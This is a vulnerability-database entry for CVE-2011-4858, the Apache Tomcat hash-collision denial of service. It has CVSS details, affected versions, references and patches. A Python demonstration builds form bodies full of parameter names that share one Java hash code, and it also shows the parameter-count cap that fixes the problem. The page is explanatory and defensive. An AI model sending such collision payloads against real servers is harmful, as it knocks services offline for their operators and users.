Lumension® Endpoint Intelligence Center

Overview

Vulnerability Score 5.0 (CVSS v2 base score; the fields below give the vector AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE Id CVE-2011-4858
Last Modified 05 Mar 2014 11:33:57
Published 05 Jan 2012 02:55:01
Confidentiality Impact NONE
Integrity Impact NONE
Availability Impact PARTIAL
Access Vector NETWORK
Access Complexity LOW
Authentication NONE

CVE-2011-4858

Summary

Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. Request parameters are stored in a java.util.HashMap keyed by String.hashCode(), a deterministic, unkeyed function (h = 31*h + c), so an attacker can precompute thousands of distinct parameter names that share one hash code; every insertion then walks the same bucket and parsing becomes quadratic in the number of parameters, so a single POST of a few hundred kilobytes can pin a CPU core for minutes. The fixed releases (5.5.35, 6.0.35, 7.0.23) add the maxParameterCount connector attribute (default 10000), which limits how many parameter/value pairs the container will parse; pairs beyond the limit are ignored and logged, and the new FailedRequestFilter can reject such requests outright.
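The collision mechanism and the counter-measure, as an added example written for this page (it is not Tomcat's code, NVD text, or the referenced PoC). java_string_hash reimplements Java's String.hashCode(); ChainedMap is a simplified stand-in for java.util.HashMap instrumented to count key comparisons; parse_form_body is a toy form parser whose max_parameter_count mirrors Tomcat's maxParameterCount default of 10000 but raises instead of silently ignoring the excess. The payload built by attack_body is constructed here for the demonstration.

```python
# Added example (not Tomcat's code): why predictable String.hashCode() collisions
# make parameter parsing quadratic, and the parameter-count cap that closes it.
# ChainedMap and parse_form_body are simplified stand-ins, written for this page,
# for java.util.HashMap and Tomcat's parameter parser.
import itertools

MASK32 = 0xFFFFFFFF


def java_string_hash(s: str) -> int:
    """Java's String.hashCode(): h = 31*h + c over the code units, wrapping to a
    signed 32-bit int (ASCII/BMP input assumed). Deterministic and unkeyed,
    which is what lets an attacker precompute collisions."""
    h = 0
    for ch in s:
        h = (31 * h + ord(ch)) & MASK32
    return h - (1 << 32) if h & 0x80000000 else h


def colliding_keys(count: int, blocks=("Aa", "BB")) -> list:
    """Return `count` distinct strings that all share one Java hash code.

    "Aa" and "BB" both hash to 2112. Because h(x + y) == h(x) * 31**len(y) + h(y),
    any concatenation of k equal-length, equal-hash blocks hashes identically,
    so len(blocks)**k distinct colliding names come for free.
    """
    k = 1
    while len(blocks) ** k < count:
        k += 1
    keys = []
    for combo in itertools.product(blocks, repeat=k):
        if len(keys) == count:
            break
        keys.append("".join(combo))
    return keys


class ChainedMap:
    """Separate-chaining table bucketed by java_string_hash, like the HashMap
    Tomcat stored parameters in: each put() walks its bucket comparing keys."""

    def __init__(self, nbuckets: int = 1024):
        self.buckets = [[] for _ in range(nbuckets)]
        self.comparisons = 0  # instrumentation: key comparisons performed

    def put(self, key: str, value: str) -> None:
        bucket = self.buckets[java_string_hash(key) % len(self.buckets)]
        for entry in bucket:
            self.comparisons += 1
            if entry[0] == key:
                entry[1] = value
                return
        bucket.append([key, value])

    def __len__(self) -> int:
        return sum(len(b) for b in self.buckets)


class TooManyParameters(Exception):
    pass


def parse_form_body(body: str, max_parameter_count: int = 10000) -> ChainedMap:
    """Parse an application/x-www-form-urlencoded body (no percent-decoding)
    into a ChainedMap. The cap mirrors Tomcat's maxParameterCount connector
    attribute (default 10000); Tomcat ignores and logs the excess, this toy
    parser raises so the effect is visible."""
    params = ChainedMap()
    seen = 0
    for pair in body.split("&"):
        if not pair:
            continue
        seen += 1
        if seen > max_parameter_count:
            raise TooManyParameters(f"more than {max_parameter_count} parameters")
        name, _, value = pair.partition("=")
        params.put(name, value)
    return params


def attack_body(n: int) -> str:
    """Constructed attacker payload: n distinct names, one shared hash code."""
    return "&".join(f"{name}=x" for name in colliding_keys(n))


def compare_cost(n: int = 2000) -> dict:
    """Insert n colliding names vs n ordinary names and report comparisons.
    Colliding inserts cost n*(n-1)/2 comparisons; ordinary ones a few per key."""
    hostile = parse_form_body(attack_body(n))
    benign = parse_form_body("&".join(f"p{i}=x" for i in range(n)))
    return {
        "n": n,
        "hostile_comparisons": hostile.comparisons,
        "benign_comparisons": benign.comparisons,
        "one_hash_code": len({java_string_hash(k) for k in colliding_keys(n)}) == 1,
    }


if __name__ == "__main__":
    print(compare_cost())
    try:
        parse_form_body(attack_body(50), max_parameter_count=20)
    except TooManyParameters as exc:
        print("capped:", exc)
```

With n = 2000 the hostile body costs 1,999,000 key comparisons against a few thousand for the benign one, and the cost keeps growing quadratically with the number of parameters an attacker fits in one request body; the count cap bounds that work regardless of how cheaply the collisions are generated.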

Vulnerable Systems

Application

  • Apache Tomcat 5.5.x releases before 5.5.35 (5.5.35 itself contains the fix)

  • Apache Tomcat 6.0.0
  • Apache Tomcat 6.0.1
  • Apache Tomcat 6.0.2
  • Apache Tomcat 6.0.3
  • Apache Tomcat 6.0.4
  • Apache Tomcat 6.0.5
  • Apache Tomcat 6.0.6
  • Apache Tomcat 6.0.7
  • Apache Tomcat 6.0.8
  • Apache Tomcat 6.0.9
  • Apache Tomcat 6.0.10
  • Apache Tomcat 6.0.11
  • Apache Tomcat 6.0.12
  • Apache Tomcat 6.0.13
  • Apache Tomcat 6.0.14
  • Apache Tomcat 6.0.15
  • Apache Tomcat 6.0.16
  • Apache Tomcat 6.0.17
  • Apache Tomcat 6.0.18
  • Apache Tomcat 6.0.19
  • Apache Tomcat 6.0.20
  • Apache Tomcat 6.0.21
  • Apache Tomcat 6.0.22
  • Apache Tomcat 6.0.23
  • Apache Tomcat 6.0.24
  • Apache Tomcat 6.0.25
  • Apache Tomcat 6.0.26
  • Apache Tomcat 6.0.27
  • Apache Tomcat 6.0.28
  • Apache Tomcat 6.0.29
  • Apache Tomcat 6.0.30
  • Apache Tomcat 6.0.31
  • Apache Tomcat 6.0.32
  • Apache Tomcat 6.0.33
  • Apache Tomcat 6.0.34
  • Apache Tomcat 7.0.0
  • Apache Tomcat 7.0.1
  • Apache Tomcat 7.0.2
  • Apache Tomcat 7.0.3
  • Apache Tomcat 7.0.4
  • Apache Tomcat 7.0.5
  • Apache Tomcat 7.0.6
  • Apache Tomcat 7.0.7
  • Apache Tomcat 7.0.8
  • Apache Tomcat 7.0.9
  • Apache Tomcat 7.0.10
  • Apache Tomcat 7.0.11
  • Apache Tomcat 7.0.12
  • Apache Tomcat 7.0.13
  • Apache Tomcat 7.0.14
  • Apache Tomcat 7.0.15
  • Apache Tomcat 7.0.16
  • Apache Tomcat 7.0.17
  • Apache Tomcat 7.0.18
  • Apache Tomcat 7.0.19
  • Apache Tomcat 7.0.20
  • Apache Tomcat 7.0.21
  • Apache Tomcat 7.0.22


References

CERT-VN - VU#903934

CONFIRM - https://bugzilla.redhat.com/show_bug.cgi?id=750521

MISC - http://www.ocert.org/advisories/ocert-2011-003.html

MISC - http://www.nruns.com/_downloads/advisory28122011.pdf

CONFIRM - http://tomcat.apache.org/tomcat-7.0-doc/changelog.html

MLIST - [announce] 20111228 [SECURITY] Apache Tomcat and the hashtable collision DoS vulnerability

MISC - https://github.com/FireFart/HashCollision-DOS-POC/blob/master/HashtablePOC.py

HP - HPSBUX02741

DEBIAN - DSA-2401

SECUNIA - 48791

SECUNIA - 48790

HP - SSRT101146

HP - HPSBUX02860

SECUNIA - 55115

SECUNIA - 54971

REDHAT - RHSA-2012:0406

REDHAT - RHSA-2012:0089

REDHAT - RHSA-2012:0325

REDHAT - RHSA-2012:0078

REDHAT - RHSA-2012:0077

REDHAT - RHSA-2012:0076

REDHAT - RHSA-2012:0075

REDHAT - RHSA-2012:0074

Related Patches

Red Hat 2012:0474-03 RHSA Moderate: tomcat5 security update for RHEL 5 x86

Red Hat 2012:0474-03 RHSA Moderate: tomcat5 security update for RHEL 5 x86_64

Novell SUSE 2012:7933 tomcat5 security update for SLES 10 SP4 i586

Novell SUSE 2012:7933 tomcat5 security update for SLES 10 SP4 x86_64


Last Updated: 27 May 2016 10:58:00